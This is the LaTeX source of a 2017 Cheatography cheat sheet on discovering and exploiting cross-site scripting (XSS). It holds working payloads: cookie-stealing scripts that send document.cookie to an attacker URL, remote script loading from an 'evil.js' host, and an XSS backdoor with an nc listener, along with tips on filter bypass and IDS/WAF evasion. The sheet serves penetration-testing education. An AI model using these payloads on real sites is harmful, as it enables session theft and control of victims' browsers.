\documentclass[10pt,a4paper]{article}

% Packages
\usepackage{fancyhdr}           % For header and footer
\usepackage{multicol}           % Allows multicols in tables
\usepackage{tabularx}           % Intelligent column widths
\usepackage{tabulary}           % Used in header and footer
\usepackage{hhline}             % Border under tables
\usepackage{graphicx}           % For images
\usepackage{xcolor}             % For hex colours
%\usepackage[utf8x]{inputenc}    % For unicode character support
\usepackage[T1]{fontenc}        % Without this we get weird character replacements
\usepackage{colortbl}           % For coloured tables
\usepackage{setspace}           % For line height
\usepackage{lastpage}           % Needed for total page number
\usepackage{seqsplit}           % Splits long words.
%\usepackage{opensans}          % Can't make this work so far. Shame. Would be lovely.
\usepackage[normalem]{ulem}     % For underlining links
% Most of the following are not required for the majority
% of cheat sheets but are needed for some symbol support.
\usepackage{amsmath}            % Symbols
\usepackage{MnSymbol}           % Symbols
\usepackage{wasysym}            % Symbols
%\usepackage[english,german,french,spanish,italian]{babel}              % Languages

% Document Info
\author{binca}
\pdfinfo{
  /Title (xss-discovery.pdf)
  /Creator (Cheatography)
  /Author (binca)
  /Subject (XSS Discovery Cheat Sheet)
}

% Lengths and widths
\addtolength{\textwidth}{6cm}
\addtolength{\textheight}{-1cm}
\addtolength{\hoffset}{-3cm}
\addtolength{\voffset}{-2cm}
\setlength{\tabcolsep}{0.2cm} % Space between columns
\setlength{\headsep}{-12pt} % Reduce space between header and content
\setlength{\headheight}{85pt} % If less, LaTeX automatically increases it
\renewcommand{\footrulewidth}{0pt} % Remove footer line
\renewcommand{\headrulewidth}{0pt} % Remove header line
\renewcommand{\seqinsert}{\ifmmode\allowbreak\else\-\fi} % Hyphens in seqsplit
% This two commands together give roughly
% the right line height in the tables
\renewcommand{\arraystretch}{1.3}
\onehalfspacing

% Commands
\newcommand{\SetRowColor}[1]{\noalign{\gdef\RowColorName{#1}}\rowcolor{\RowColorName}} % Shortcut for row colour
\newcommand{\mymulticolumn}[3]{\multicolumn{#1}{>{\columncolor{\RowColorName}}#2}{#3}} % For coloured multi-cols
\newcolumntype{x}[1]{>{\raggedright}p{#1}} % New column types for ragged-right paragraph columns
\newcommand{\tn}{\tabularnewline} % Required as custom column type in use

% Font and Colours
\definecolor{HeadBackground}{HTML}{333333}
\definecolor{FootBackground}{HTML}{666666}
\definecolor{TextColor}{HTML}{333333}
\definecolor{DarkBackground}{HTML}{3AA32A}
\definecolor{LightBackground}{HTML}{F2F9F1}
\renewcommand{\familydefault}{\sfdefault}
\color{TextColor}

% Header and Footer
\pagestyle{fancy}
\fancyhead{} % Set header to blank
\fancyfoot{} % Set footer to blank
\fancyhead[L]{
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{C}
    \SetRowColor{DarkBackground}
    \vspace{-7pt}
    {\parbox{\dimexpr\textwidth-2\fboxsep\relax}{\noindent
        \hspace*{-6pt}\includegraphics[width=5.8cm]{/web/www.cheatography.com/public/images/cheatography_logo.pdf}}
    }
\end{tabulary}
\columnbreak
\begin{tabulary}{11cm}{L}
    \vspace{-2pt}\large{\bf{\textcolor{DarkBackground}{\textrm{XSS Discovery Cheat Sheet}}}} \\
    \normalsize{by \textcolor{DarkBackground}{binca} via \textcolor{DarkBackground}{\uline{cheatography.com/44948/cs/13434/}}}
\end{tabulary}
\end{multicols}}

\fancyfoot[L]{ \footnotesize
\noindent
\begin{multicols}{3}
\begin{tabulary}{5.8cm}{LL}
  \SetRowColor{FootBackground}
  \mymulticolumn{2}{p{5.377cm}}{\bf\textcolor{white}{Cheatographer}}  \\
  \vspace{-2pt}binca \\
  \uline{cheatography.com/binca} \\
  \end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Cheat Sheet}}  \\
   \vspace{-2pt}Not Yet Published.\\
   Updated 9th November, 2017.\\
   Page {\thepage} of \pageref{LastPage}.
\end{tabulary}
\vfill
\columnbreak
\begin{tabulary}{5.8cm}{L}
  \SetRowColor{FootBackground}
  \mymulticolumn{1}{p{5.377cm}}{\bf\textcolor{white}{Sponsor}}  \\
  \SetRowColor{white}
  \vspace{-5pt}
  %\includegraphics[width=48px,height=48px]{dave.jpeg}
  Measure your website readability!\\
  www.readability-score.com
\end{tabulary}
\end{multicols}}




\begin{document}
\raggedright
\raggedcolumns

% Set font size to small. Switch to any value
% from this page to resize cheat sheet text:
% www.emerson.emory.edu/services/latex/latex_169.html
\footnotesize % Small font.

\begin{multicols*}{2}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Discovery Tests}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Various types of payloads should be used in discovery.} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Reflection tests}} use simple but unique strings to determine if the input is reflected. {\bf{86868686}}} \tn 
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Filter tests}} use characters to determine if there is filtering or encoding present. {\bf{\textless{} \textgreater{} ( ) = ' " /  ; {[} {]} \$ -{}- \# \& // }}} \tn 
% Row Count 8 (+ 3)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{POC payloads}} are input meant to attempt to demonstrate the presence of CSS **\textless{}script\textgreater{}alert("Hello!");\textless{}/script\textgreater{}} \tn 
% Row Count 11 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{XSS Injection Points}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Any user controllable app iput could prove vulnerable.} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Submit innocuous but unique strings that allow for identification of our input in the response} \tn 
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Entry points include:\{\{nl\}\} {\bf{URL query parameter}} \{\{nl\}\}{\bf{POST parameters}}\{\{nl\}\}{\bf{HTTP headers including User-Agent, Referer, Cookie}}} \tn 
% Row Count 7 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Reflection Tests}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Reflected XSS provides immediate response reflected in input.} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Stored XSS may not be immediately rendered and can be in a totally different area of the app.} \tn 
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Unique variations of the input should be used o allow for easier identification of input resulting in XSS.} \tn 
% Row Count 7 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Common XSS Injection Contexts}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Injection context is understanding the contextual details of the response containing our input.  It is critical to having JavaScript execute where our input lands.} \tn 
% Row Count 4 (+ 4)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Most common XSS injection contexts: HTML, Tag attribute, and existing JavaScript code} \tn 
% Row Count 6 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{HTML Considerations}}: The payload can be self-contained and doesn't require a particular prefix or suffix due to the context.} \tn 
% Row Count 9 (+ 3)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Tag Attribute Considerations}}: The prefix option to close value assignment and possibly lose the tag {\bf{"\textgreater{}}}. Suffix usage is dependent on injected tags.} \tn 
% Row Count 13 (+ 4)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Existing JavaScript Considerations}} Suffix options include JS line terminator {\bf{;}} and sngle line comment delimiter {\bf{//}}.  Often will be within a JS function so closing paranthesis might also be needed {\bf{)}}} \tn 
% Row Count 18 (+ 5)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{HTML Example \newline Payload: {\bf{\textless{}img src="x" onerror=alert("attack!");/\textgreater{}}} \newline Resulting HTML: \textless{}div\textgreater{}\textless{}p\textgreater{}Are you ready? \textless{}img src="x" onerror=alert("attack!");/\textgreater{}\textless{}/p\textgreater{}\textless{}/div\textgreater{} \newline  \newline Tag Attribute Example \newline Event Injection: {\bf{868686" onload="alert(86)}} \newline Resultant HTML: \textless{}input type="text" name="xss" value="868686" onload="alert(86)"\textgreater{} \newline  \newline Existing JavaScript Example \newline Payload: **86";alert(86);// \newline Resultant HTML: \textless{}script\textgreater{}var \seqsplit{Variable="86";alert(86);//";} \textless{}/script\textgreater{}}  \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Filter Tests and Bypass/Evasion}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Discovering injection points that yield immediate or delayed reflection != XSS vulnerability} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{The next step would be to test for the presence and efficacy of filtering and encoding, as these are increasingly common} \tn 
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Most filtering utilizing blacklisting leaving room for evasion or bypass.} \tn 
% Row Count 7 (+ 2)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Goal is to determine whether and how filter/encoding is employed for successfully crafting XSS payloads.} \tn 
% Row Count 10 (+ 3)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Target XSS payloads that specifically do NOT require filtered characters.}}} \tn 
% Row Count 12 (+ 2)
% Row 5
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Craft the payload to escape filter logic.}}} \tn 
% Row Count 13 (+ 1)
% Row 6
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{{\bf{Encode the data to confuse or bypass the filter.}}} \tn 
% Row Count 15 (+ 2)
% Row 7
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{The {\bf{\textless{}script\textgreater{}}} tag is one of the most commonly filtered tags, and next the angle brackets, but events can reference JavaScript without these.  {\bf{DOM Event Handlers}} sometimes provide a bypass, such as using {\bf{onerror}} with a broken link.} \tn 
% Row Count 20 (+ 5)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Browser False Negatives}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{XSS payload execution depends on the particular vendor and version of the browser.} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Most major browsers now have built-in XSS filtering capabilities.  When testing for XSS a tester must make sure the browser isn't blocking the attack payload.} \tn 
% Row Count 6 (+ 4)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Options:\{\{nl\}\}{\bf{Use Firefox until it has active XSS filter, though it uses Content-Security-Policy HTTP header it is not a formal standard}}\{\{nl\}\}{\bf{Use an older browser, though this can cause issues in rendering HTML5 or non-eval() JSON parsing}}\{\{nl\}\}{\bf{Fully disable XSS filtering}}} \tn 
% Row Count 12 (+ 6)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Remember the browser is not the focus of the assessment.} \tn 
% Row Count 14 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{POC Payloads}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{There are prepared fuzzing payload collections including {\bf{Fuzzdb, JBroFuzz (part of ZAP), Burp, ZAP (JBroFuzz/fuzzdb), and XSSer}}} \tn 
% Row Count 3 (+ 3)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Considerations should be made for stealth, by decreasing speed and changing payloads detection by IDS and WAFs can be reduced.} \tn 
% Row Count 6 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Upgrades to alert( )}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{POC will be a static alert(x), confirm(x) or prompt(x, y)} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Demonstrate domain application context with {\bf{alert(document.domain)}} or {\bf{confirm(document.domain)}}} \tn 
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Demonstrate session/content abuses with {\bf{document.cookie}} or {\bf{forged in-session Requests}} or {\bf{defacement}}} \tn 
% Row Count 8 (+ 3)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Demonstrate external JavaScript loading with {\bf{src="//security.org/evil.js"}}} \tn 
% Row Count 10 (+ 2)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Demonstrate advanced user attacks with framework through the use of {\bf{BruteLogic XSS Shell, BeEF, Metasploit escalation, etc.}}} \tn 
% Row Count 13 (+ 3)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Session Hijacking}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Achieved by stealing the tokens for a user's active session and reusing them.} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Injected script is presented from the same origin as the session token, which allows for interaction directly with the page's DOM.} \tn 
% Row Count 5 (+ 3)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Key properties, methods and events for session hijacking:\{\{nl\}\}{\bf{document.cookie}} is the most common target\{\{nl\}\}{\bf{document.URL}} query parameter\{\{nl\}\}{\bf{document.forms}} are hidden form fields and CSRF tokens} \tn 
% Row Count 10 (+ 5)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Using {\bf{location}} to send data to a server we control {\bf{will redirect}} the victim's browser which makes the attack more obvious.\{\{nl\}\} Example: {\bf{location='URL'+document.cookie, \seqsplit{location.replace('URL'+document}.cookie)}}} \tn 
% Row Count 15 (+ 5)
% Row 4
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Instead of using location, the {\bf{fetch() API and function}} may also be used.} \tn 
% Row Count 17 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{Note: {\bf{document.location}} and {\bf{window.location}} are relatively interchangeable.}  \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{Session Theft Without Redirection}}  \tn
% Row 0
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{For less obvious session theft create a broken image that points to the cookie catching JavaScript.} \tn 
% Row Count 2 (+ 2)
% Row 1
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{{\bf{\textless{}script\textgreater{}img=new Image(); \seqsplit{img.src='url/cookiecatcher.php?='+document}.cookie'\textless{}/script\textgreater{}}}} \tn 
% Row Count 4 (+ 2)
% Row 2
\SetRowColor{LightBackground}
\mymulticolumn{1}{x{8.4cm}}{This assumes there is no {\bf{HttpOnly}} flag set, which will restrict interaction with cookies to HTML only.} \tn 
% Row Count 7 (+ 3)
% Row 3
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{Leveraging HTTPS can help bypass egress filtering and so there is not issue with a Secure flag.} \tn 
% Row Count 9 (+ 2)
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}

\begin{tabularx}{8.4cm}{X}
\SetRowColor{DarkBackground}
\mymulticolumn{1}{x{8.4cm}}{\bf\textcolor{white}{BruteLogic Interactive XSS Backdoor}}  \tn
\SetRowColor{white}
\mymulticolumn{1}{x{8.4cm}}{XSS Injection \newline % Row Count 1 (+ 1)
\textless{}svg \seqsplit{onload=setInterval(function()} \{d=document; \seqsplit{z=d.createElement("script");} z.src="URI"; d.body.appendChild(z)\}, 0)\textgreater{} \newline % Row Count 4 (+ 3)
Shell Controller (Terminal on Attacker Machine) \newline % Row Count 5 (+ 1)
while: ; to printf "j \$; read c; echo \$c | nc -lvvp 1234 \textgreater{} /dev/null; done% Row Count 7 (+ 2)
} \tn 
\hhline{>{\arrayrulecolor{DarkBackground}}-}
\end{tabularx}
\par\addvspace{1.3em}


% That's all folks
\end{multicols*}

\end{document}